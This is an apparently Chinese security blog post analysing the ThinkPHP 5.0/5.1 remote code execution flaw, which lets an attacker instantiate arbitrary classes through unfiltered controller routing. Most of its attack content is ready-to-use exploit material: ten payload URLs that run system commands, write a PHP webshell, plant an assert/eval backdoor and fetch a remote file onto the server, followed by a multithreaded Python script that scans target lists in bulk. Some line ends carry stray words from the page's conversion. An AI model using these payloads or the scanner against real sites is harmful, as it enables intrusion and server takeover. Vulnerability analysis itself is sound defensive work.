前言:php
昨天爆出了ThinkPHP5框架缺陷致使遠程命令執行,大佬們都遇上潮流挖洞,小白仍是默默學習一下這個漏洞html
漏洞影響範圍:python
Thinkphp 5.1.0 - 5.1.31
Thinkphp 5.0.5 - 5.0.23git
漏洞產生緣由:github
Thinkphp5.x版本(5.0.20)中沒有對路由中的控制器進行嚴格過濾,在存在 admin,index 模塊、沒有開啓強制路由的條件下(默認不開啓),致使能夠注入惡意代碼利用反射類調用命名空間其餘任意內置類,完成遠程代碼執行。thinkphp
漏洞分析:shell
既然是沒有正確處理控制器名 $controller ,從最開始獲取控制器名的代碼來看:windows
發如今 $controller 中有過濾字符串中的 HTML 標籤的strip_tags()函數,網站沒有開啓強制路由,問題可能出如今路由調度時,來看執行路由調度的代碼:app
其中使用了 $this->app->controller 的方法來實例化控制器,而後調用實例化中的方法,跟進controller方法:框架
其中經過 parseModuleAndClass 方法解析出 $module,$class。而後實例化 $class。
着重看一下 parseModuleAndClass 方法:
發現 $name 若是以反斜線\開始時,直接進入第一個if判斷,將 $name 直接做爲類名,若是能夠控制 $name (即路由中的controller部分),那麼就能夠實例化任何一個類。
回看路由解析代碼,其中的 parseUrl 方法調用了 parseUrlPath 方法來解析 $url ,也就是 pathinfo 中的路由信息
來看 parseUrlPath 如何解析 $url :
使用/對 $url 進行分割,未進行任何過濾,其中路由url從path()中獲取。
這裏 Config::get('var_pathinfo') 是配置文件中的設置的參數,'var_pathinfo' 的默認配置爲s,咱們能夠利用
$_GET['s']來傳遞路由信息,也能夠利用pathinfo來傳遞,但測試時windows環境會將$_SERVER['pathinfo']中的\
替換爲/。結合前面分析可得初步利用代碼以下:index.php?s=index/\namespace\class/method,
這將會實例化\namespace\class並執行method方法。
漏洞復現:
1. 代碼執行
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2.任意文件寫入
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要寫入的文件內容url編碼
把一句話 <?php phpinfo()?> 進行url編碼:%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3f%3e
寫入文件:
嘗試訪問shell.php:
寫入成功!
放出一些payload:
1. /index.php?s=index/\think\Request/input&filter=phpinfo&data=1
2. /index.php?s=index/\think\Request/input&filter=system&data=id
3. /index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
4. /index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
5. /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
6. /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7. /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
8. /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
9. /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET['joker']);&joker=system("whoami");
10. /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=print_r(file_put_contents(%27xx.php%27,file_get_contents(%27https://www.baidu.com/x.txt%27)))
(先file_get_contents讀取遠程文件內容爲一句話 而後file_put_contents在當前目錄下寫入文件 並且不帶<>)
給出tdcoming大佬批量檢測腳本:
#!/usr/bin/env python # -*- coding: utf-8 -*-
''' name: thinkphp遠程代碼檢測 description: ThinkPHP5 5.0.22/5.1.29 遠程代碼執行漏洞 ''' import re import sys import requests import queue import threading from bs4 import BeautifulSoup class thinkphp_rce(threading.Thread): def __init__(self, q): threading.Thread.__init__(self) self.q = q def run(self): while not self.q.empty(): url=self.q.get() headers = {"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"} payload = r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" vulnurl = url + payload try: response = requests.get(vulnurl, headers=headers, timeout=3, verify=False, allow_redirects=False) soup = BeautifulSoup(response.text,"lxml") if 'PHP Version' in str(soup.text): print ('[+] Remote code execution vulnerability exists at the target address') print ('[+] Vulnerability url address ' + vulnurl) with open('target.txt','a') as f1: f1.write(vulnurl+'\n') f1.close() else: print ('[-] There is no remote code execution vulnerability in the target address') except: print ('[!] Destination address cannot be connected') def urlget(): with open('url.txt','r')as f: urls=f.readlines() for tmp in urls: if '//' in tmp: url=tmp.strip('\n') urlList.append(url) else: url='http://'+tmp.strip('\n') urlList.append(url) return(urlList) f.close() if __name__=="__main__": print('''----------------掃描開始-------------------
*Made by :tdcoming
*For More :https://t.zsxq.com/Ai2rj6E
*MY Heart :https://t.zsxq.com/A2FQFMN
_______ _ _ |__ __| | | (_) | | __| | ___ ___ _ __ ___ _ _ __ __ _ | | / _` | / __|/ _ \ | '_ ` _ \ | || '_ \ / _` |
| || (_| || (__| (_) || | | | | || || | | || (_| |
|_| \__,_| \___|\___/ |_| |_| |_||_||_| |_| \__, | __/ |
|___/
''')
urlList=[] urlget() threads = [] threads_count = 10 q=queue.Queue() for url in urlList: q.put(url) for i in range(threads_count): threads.append(thinkphp_rce(q)) for i in threads: i.start() for i in threads: i.join()
一、將要檢測的目標放在url.txt裏面
二、若是存在漏洞的地址將自動生成一個target.txt文本保存
漏洞poc:
https://github.com/heroanswer/thinkphp_rce_poc
參考連接:
https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg
http://www.thinkphp.cn/topic/60400.html
http://www.thinkphp.cn/topic/60390.html
https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce